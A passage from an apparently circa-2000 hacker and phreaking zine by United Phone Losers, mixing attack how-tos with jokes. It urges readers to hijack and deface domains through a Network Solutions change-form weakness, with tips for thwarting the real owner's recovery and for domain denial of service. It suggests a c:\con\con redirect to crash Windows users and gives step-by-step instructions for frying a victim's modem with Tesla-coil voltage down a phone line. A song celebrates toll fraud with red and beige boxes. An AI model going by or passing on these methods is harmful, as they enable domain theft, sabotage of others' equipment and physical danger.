Another disturbing Whois lookup is on www.dare.org:

Drug Abuse Resistance Education (DARE-AMERICA-DOM)
Los Angeles, CA 90051-0090


Administrative Contact, Technical Contact, Zone Contact:
Lochridge, Ralph (RL10722) webmaster@DARE-AMERICA.COM
D.A.R.E. America
9800 La Cienega Blvd., Ste. 401
Inglewood , CA 90301
(310) 215-0575 (FAX) (310) 215-0180

Billing Contact:
Lochridge, Ralph (RL10722) webmaster@DARE-AMERICA.COM
D.A.R.E. America
9800 La Cienega Blvd., Ste. 401
Inglewood , CA 90301
(310) 215-0575 (FAX) (310) 215-0180

Record last updated on 28-Mar-2000.
Record created on 23-May-1996.
Database last updated on 29-Mar-2000 14:22:37 EST.

Domain servers in listed order:

This leaves me in shock that as long as some bored kid who has 2 minutes to fill out a form to make some free domain space for example on Netfirms Free Domain Webhosting (http://netfirms.com) and has read the recently published UPL article on Domain Stealing (UPL issue 16) by the twisted RBCP can own and/or deface just about any major .org .com or .net domain or fuck tmaybe even steal a goverment domain. =)

Network Solutions is like the church today in america, they are greedy basterds with a clueless or I could careless tech support attitude. I wouldn't even bother calling to inform this about this security hole as many people are informing me it was posted ot BugTraq and CERT about 3 years ago!!

So go make some free accounts on Netfirm and get to work on some big boys like Yahoo and Ebay! =) When netfirms.com eventually dies from abuse please submit more free web hosting sites so us Phone Losers can move our stolen domains to somewhere or be nice and donate some hosting space and submit to the zine. God im sounding like the church now! Well anyway longlive the 860 scene, PLA ,and Tupac and hmm the Norway band Mayhem forever. Peace!

List Of Free Domain Hosting Providers to Host Stolen Domains

    If one steals a domain from Network Solutions you gotta place it somewhere right? What fun is it to own someone else's domain and not fuck with it a little or alot? =) Why not switch hostname information and upload your own HTML and be a phat hacker like "coolio!" He's a punk ass bitch for using this easy trick to take dare.org and now he is as famous as mitnick! He had no skills but that's just my opinion and people tell me all the time that means nothing. Anyway these 100% Free Web Domain hosts on this list will provide you with a hostname and ip to change in Network Solution's Terms Of Service form on with ease. Im gonna keep writting articles spanking Network Solutions ass until they fix this 3 year old backdoor! Fuck NS!

List Of free Domain Hosting Providers

When tranferring your stolen domain to netfirms.com click do not register with internic I will do it myself on the contact form. Otherwise shit gets screwed up in the host tranfer process.

Using NS as a Web Domain Denial of Service Attack

This is just a simple followup to RBCP's breakthrough first article and my articles in this current issue of UPL on abusing internic or network solutions current wideopen contract form Email forging bug.

I figured out that by simply going to Network Solutions /make changes/domain (Victim's domain)/expert/Contract Agreement one can just type in bullshit for the Hostname and Ip therefore rendering the domain once internic updates its records in 72 hours unresolvable. Making for a nice Web Domain DoS attack.

I wish someone would fuck with Yahoo, or another high profile site that gets alot of hits per day...as im not touching those sites with a 10 foot cock, but im sure a few are open for the taking.

NS is stupid, but the company has to have ip logs of mails sent to hostmaster@networksolutions.com laying around somewhere, can't be all automatic as that is just too simple. I just get dreams of taking yahoo and just putting up a index.html that just consisted of a meta redirect refresh tag to c:\con\con\ crashing millions of unaware windows users worldwide. Would that make CNN? I think so? Would that force NS to close the bug? I think so! ;)

One word of advice, try to make sure the fake Hostname and Ip you enter looks somewhat legit just incase the owner decides to call up Network Solutions Tech Support to question the modification of his domain information. I tested this today myself on a stolen domain and was told I would have to go through alot of bullshit like 2 forms of ID and faxing to get my domain back. So always enter somewhat legit shit.

If you change ownership of the domain, make sure the owner of the domain looks somewhat real too. Just change the name and email but keep the zip, state, phone #, etc. This is just to make it harder for the real owner to retrive his account without using the backdoor himself. I only wonder what would happens if NS closes up this bug with alot of stolen domains out in the wild? Can we say Chao's AD Here? :)

Also I tried accessing network solutions today using the anonymous web browsing service and found NS's site is blocked out. So this means either alot of people use that fuckin service to access NS or alot of people are stealing domains and NS doesn't give a fuck...but your IP is logged. Be careful in your domain hacking.....

--- Jolly Spamhead

Make a Leeto Volcano
Written by JJ

Well, you see I've gone to this Japanese restaurant before, and they do this cool volcano thing.  You cut an onion in half and take the top part.  Now, cut the top part in half.  From the top part, you will make a flaming volcano that will last for about 30 seconds, complete with smoke and a tower of flame.

Now, take the most curved portion of the onion you cut up (very top part) and take out the inside 5 rings. (Note:  the rings should be small because it's all part of the trick.)  Once you have the rings, look at them.  They should be highly curved on the outside so that the bottom of the ring is larger than the top, like so--


Now, stack each onion on top of each other until it looks like a small, white volcano, like so--

Onion Volcano Image

There should be a hole in the top of the top onion.  So dont use the very top onion ring in the onion.  Now, get some oil, not car oil, but some vegetable oil or some shit like that.  Also grab some soy sauce.  To make this work, you must have a flat stove, like a frying pan, but with no curves.  Put the onion volcano on the flat surface and turn up the heat to 400 degrees.  Let it heat up for a couple minutes, about 5, then get ready for some fire!%@#$

Pour the oil in first, since the stove is hot, it should start sizzling immeadieatley.  Then as soon as possible, put the soy sauce in.  Strike a match and hold it over the top of the volcano and BOOM, you now have a towering inferno.  Depending on the amount of oil, the higher the flame and the longer the burn.  Then when the flame is about to die, start pushing the volcano around on the flat surface, it will start to cook the onion really fast and a whole bunch of smoke will pour out of the top.

Onion Volcano Second Image

It's really fun, you'll probably never do it, because it's just more useless information you'd like to have when you grow up.  Wait, if you are reading this, you will probably never grow up.  Wheeeeee!

--- JJ

The 'leet Touch
Written by Rufus T. Firefly

To the tune of "The Bad Touch" by The Bloodhound Gang.

(Ha-ha, well now.  We call this the act of phreaking.  But there are several
very effective methods of screwing the telephone company that you should know

(I'd appreciate your PIN code)

Sweat, baby, sweat, baby,
You got your red box out
And now you'll do the kind of stuff
That RBCP wrote about

You put the tones to the phone
And your heart skips a beat,
Hear a ring, the call went through,
And you are feeling so damn 'leet

You've had enough of dropping coins,
Now you're stealing calls with class,
Call your friends, call your foes,
And harass their silly ass

But what the fuck did they do?
Now the tones don't go through!
Mouthpieces are mute on all the phones,
Well, if that pisses you way off,
My brother, you are not alone

Do it now
You and me baby, are telco abusers
So let's do it like they do in the United Phone Losers.
Do it again now
You and me baby, are telco abusers
So let's do it like they do in the United Phone Losers.
Gettin' phreaky now

Beige, the kind you hook up
With roach clips and wire
Now you've got a dial tone buzzing
And you cant feel any higher

Operator? Yell at that bitch later,
Cause you were having a field day
Until Mrs. Skolnek
Picked up and heard your phone sex.
Zip, unclip, and run away

So if you're busted, can you be trusted,
To tell no one where you learned how
To own the system,
Not from us,
Must have been Cult of The Dead Cow

What do you do now, don't wanna quit yet
The night's young, don't admit defeat,
'Cause there's some stuff in that bell dumpster
For the twenty-six-hundred meet.

Do it now
You and me baby, are telco abusers
So let's do it like they do in the United Phone Losers.
You and me baby, are telco abusers
So let's do it like they do in the United Phone Losers.

(repeat chorus until sick of it)

--- Rufus T. Firefly

Remotely Kill Modems With "Back to the Future" Volts
Written by Jolly Spamhead

This is my last article im writting for awhile since im getting burn out from too much typing and staying up all night exploiting open file shares on fleet NT's. So i'll leave you with my most destructive and malicious article I have ever typed to date.

In this article I'll show you how to make a very effective modem killer weapon, especially on crossbar phone systems (CPS). I take no responsiblity whatsoever if you kill yourself or get hurt in an attempt at trying to do this fucked up trick or for some reason it just doesn't work anymore as I haven't performed it since early 1998. A great person once said it is never too late to pass infomation on...so on wit the show bitch!

What the fuck is this strange device?
It's a Tesla Coil!  Concentrated static electricity you f00l! The Tesla coil when properly used will generate litrally thousands of volts at very low amps. That just happens to be the right current to bake silicon chip cookies over a open camp fire strumming Bodycount songs!
  1. Disconnect all phones from your line.  Disconnect answering machines and any data-transmission devices.
  2. Run a test on the coil and disconnect nearby grounded objects.  (Lamps, stereos, TV's,  Sex Vibrators...)
  3. Connect one phone that you would'nt mind maybe having to sacrifice for the act of revenge.(It usually doesn't destroy phones, but people have told me they have seen them melt off walls!). =)
  4. Connect iron or steel balls to the green and red wires of your connected phone (aka the biege box wires that go on the clips.) It and 12 terminals of your phone.
  5. Put on a pair of thick rubber gloves (EXTREMELY IMPORTANT STEP HERE!)
  6. Charge the coil to at least 10,000 volts.  An ideal setting is around 18 to 19 thousand, but 10,000 will jump Ma-Bells line surge protectors and that's what we are trying to do here.
  7. Hold metal balls in your left hand. In your right hand hold your cock and proceed to stroke firmly until climax is reached, then lick up the mess! Just fucking around here again! =) Just Make sure the balls don't touch each other ok? Great! When the coil is fully charged, clip the steel ball connected to the red wire to the base of the Tesla coil and hold the other metal ball as far away from the coil as you can.
  8. Dial the offending modems phone number (OCI's fax # would be nice).
  9. When you are connected, move the metal object connected to the green wire within 2 feet of the coils top. Don't be afraid of the little bolts of electricity shooting from the top of the coil...its only the stuff that hits poor hopeless saps like Amit Grover AKA Foreskin boy every once and awhile.
  10. Within 3-5 seconds a huge bolt of lightning will shoot forth at the phone from the hand you are holding the balls in. Hold on tight cause it will feel like a load of ants! You will immediatly hear many strange occilations to the carrier on the phone.  The last noise you will hear from the phone is a pop! That is the last cry of agony as the modem shuts down

This is guaranteed to fry the modem, the computer and any peripherals connected to it like Scanners, printers, 8-ball porn cams. =) So Fuck you all! l8r!

--- Jolly Spamhead

Ending Notes
Written by linear

So I've been gone for a while, and no one's really heard from me. So I decided I should make some comments just to let everyone know I'm still alive and well, for the most part. I've decided to answer some of the questions I seem to be getting most often when I do manage to get online for five minutes or so. Here we go....

  • No, I'm still not officially "back", and probably won't be for some time now. It looks like I won't be back until the beginning of summer.
  • Yes, it's true. nawleed is no longer a part of the UPL staff.
  • I haven't done an update on the site layout in quite a while. This is because I'm usually online no longer than 5 minutes every other day. I know everyone misses my monthly layout changes, but what can I say?
  • No, I really don't have any clue what's been happening all this time I've been gone. All I know is a lot more people hate me than they used to.
  • Quick! Everyone go out and get the Spring 2600 issue (17:1)!! RTF's humorous David Letterman article that can be found in UPL016 is talked about in the letters section.
  • No, we are not looking to fill nawleed's position
  • The pornography hosted by our site has nothing to do with anything. Don't worry about it. Now lets never speak of this again.
  • Yes, I really do hate my girlfriend.
  • No, you cannot have the key to #jen..... that's my private channel you bastard.
  • Yes, I will be writing real articles for UPL sometime soon. Hopefully.
  • Yes, I hope to see IRC Log Happy Fun Time as a permanent section in the new UPL issues
  • If you emailed me and I never answered you, or if you put up the UPL banner and I never added yours to our rotation or linked to you or something, it's not because you suck, it's because I don't have the time to do it (but that still doesn't mean you don't suck). Sorry.
  • No, I don't know what the new UPL irc server/channel is at the time.

That's about it for now, I guess. Like I said, I really don't know what's going on in the UPL scene right now, so I don't have much to say. BYE!

--- linear


Your actions are your responsibility. We do not condone or encourage anything described within this text file. Anything that happens because of what you do, is because YOU did it. In short, none of it is our fault if you get locked in prison for four years without trial.


linear                Jaded

el caco

           Jc            Rufus T. Firefly